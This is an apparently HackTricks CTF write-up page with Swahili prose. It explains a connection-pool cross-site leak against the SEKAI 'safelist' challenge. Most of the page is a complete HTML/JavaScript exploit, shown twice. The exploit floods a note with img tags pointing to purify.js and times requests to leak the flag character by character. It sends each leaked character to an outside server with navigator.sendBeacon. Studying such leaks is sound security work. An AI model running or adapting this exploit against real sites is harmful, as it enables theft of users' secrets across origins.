Connection Pool by Destination Example

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Katika hii exploit, @terjanq anapendekeza suluhisho lingine kwa changamoto iliyotajwa kwenye ukurasa ufuatao:

Hebu tuone jinsi hii exploit inavyofanya kazi:

Mshambuliaji ataingiza noti yenye <img tags nyingi kadri iwezekanavyo zinazo pakia /js/purify.js (zaidi ya 6 ili kuzuia chanzo).
Kisha, mshambuliaji ata ondoa noti yenye index 1.
Kisha, mshambuliaji ata [fanya bot ipate ukurasa na noti iliyobaki] na atatuma ombio kwa victim.com/js/purify.js ambayo atafanya kiasi.
Ikiwa kiasi ni kikubwa, kuingizwa kulikuwa kwenye noti iliyobaki, ikiwa kiasi ni kidogo, bendera ilikuwa hapo.

Tbh, nikisoma script nilikosa sehemu ambapo mshambuliaji anafanya bot ipakue ukurasa ili kuamsha img tags, sioni chochote kama hicho kwenye msimbo

<html>
<head>
<script>
const SITE_URL = 'https://safelist.ctf.sekai.team/';
const PING_URL = 'https://myserver';
function timeScript(){
return new Promise(resolve => {
var x = document.createElement('script');
x.src = 'https://safelist.ctf.sekai.team/js/purify.js?' + Math.random();
var start = Date.now();
x.onerror = () => {
console.log(`Time: ${Date.now() - start}`); //Time request
resolve(Date.now() - start);
x.remove();
}
document.body.appendChild(x);
});
}

add_note = async (note) => {
let x = document.createElement('form')
x.action = SITE_URL + "create"
x.method = "POST"
x.target = "xxx"

let i = document.createElement("input");
i.type = "text"
i.name = "text"
i.value = note
x.appendChild(i)
document.body.appendChild(x)
x.submit()
}

remove_note = async (note_id) => {
let x = document.createElement('form')
x.action = SITE_URL+"remove"
x.method = "POST"
x.target = "_blank"

let i = document.createElement("input");
i.type = "text"
i.name = "index"
i.value = note_id
x.appendChild(i)
document.body.appendChild(x)
x.submit()
}

const sleep = ms => new Promise(resolve => setTimeout(resolve, ms));
// }zyxwvutsrqponmlkjihgfedcba_
const alphabet = 'zyxwvutsrqponmlkjihgfedcba_'
var prefix = 'SEKAI{xsleakyay';
const TIMEOUT = 500;
async function checkLetter(letter){
// Chrome puts a limit of 6 concurrent request to the same origin. We are creating a lot of images pointing to purify.js
// Depending whether we found flag's letter it will either load the images or not.
// With timing, we can detect whether Chrome is processing purify.js or not from our site and hence leak the flag char by char.
const payload = `${prefix}${letter}` + Array.from(Array(78)).map((e,i)=>`<img/src=/js/purify.js?${i}>`).join('');
await add_note(payload);
await sleep(TIMEOUT);
await timeScript();
await remove_note(1); //Now, only the note with the flag or with the injection existsh
await sleep(TIMEOUT);
const time = await timeScript(); //Find out how much a request to the same origin takes
navigator.sendBeacon(PING_URL, [letter,time]);
if(time>100){
return 1;
}
return 0;
}
window.onload = async () => {
navigator.sendBeacon(PING_URL, 'start');
// doesnt work because we are removing flag after success.
// while(1){
for(const letter of alphabet){
if(await checkLetter(letter)){
prefix += letter;
navigator.sendBeacon(PING_URL, prefix);
break;
}
}
// }
};
</script>
</head>
<body>
</body>
</html>

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

PreviousConnection Pool Examples NextCookie Bomb + Onerror XS Leak

Last updated 4 months ago

<html> <head> <script> const SITE_URL = 'https://safelist.ctf.sekai.team/'; const PING_URL = 'https://myserver'; function timeScript(){ return new Promise(resolve => { var x = document.createElement('script'); x.src = 'https://safelist.ctf.sekai.team/js/purify.js?' + Math.random(); var start = Date.now(); x.onerror = () => { console.log(`Time: ${Date.now() - start}`); //Time request resolve(Date.now() - start); x.remove(); } document.body.appendChild(x); }); } add_note = async (note) => { let x = document.createElement('form') x.action = SITE_URL + "create" x.method = "POST" x.target = "xxx" let i = document.createElement("input"); i.type = "text" i.name = "text" i.value = note x.appendChild(i) document.body.appendChild(x) x.submit() } remove_note = async (note_id) => { let x = document.createElement('form') x.action = SITE_URL+"remove" x.method = "POST" x.target = "_blank" let i = document.createElement("input"); i.type = "text" i.name = "index" i.value = note_id x.appendChild(i) document.body.appendChild(x) x.submit() } const sleep = ms => new Promise(resolve => setTimeout(resolve, ms)); // }zyxwvutsrqponmlkjihgfedcba_ const alphabet = 'zyxwvutsrqponmlkjihgfedcba_' var prefix = 'SEKAI{xsleakyay'; const TIMEOUT = 500; async function checkLetter(letter){ // Chrome puts a limit of 6 concurrent request to the same origin. We are creating a lot of images pointing to purify.js // Depending whether we found flag's letter it will either load the images or not. // With timing, we can detect whether Chrome is processing purify.js or not from our site and hence leak the flag char by char. const payload = `${prefix}${letter}` + Array.from(Array(78)).map((e,i)=>`<img/src=/js/purify.js?${i}>`).join(''); await add_note(payload); await sleep(TIMEOUT); await timeScript(); await remove_note(1); //Now, only the note with the flag or with the injection existsh await sleep(TIMEOUT); const time = await timeScript(); //Find out how much a request to the same origin takes navigator.sendBeacon(PING_URL, [letter,time]); if(time>100){ return 1; } return 0; } window.onload = async () => { navigator.sendBeacon(PING_URL, 'start'); // doesnt work because we are removing flag after success. // while(1){ for(const letter of alphabet){ if(await checkLetter(letter)){ prefix += letter; navigator.sendBeacon(PING_URL, prefix); break; } } // } }; </script> </head> <body> </body> </html>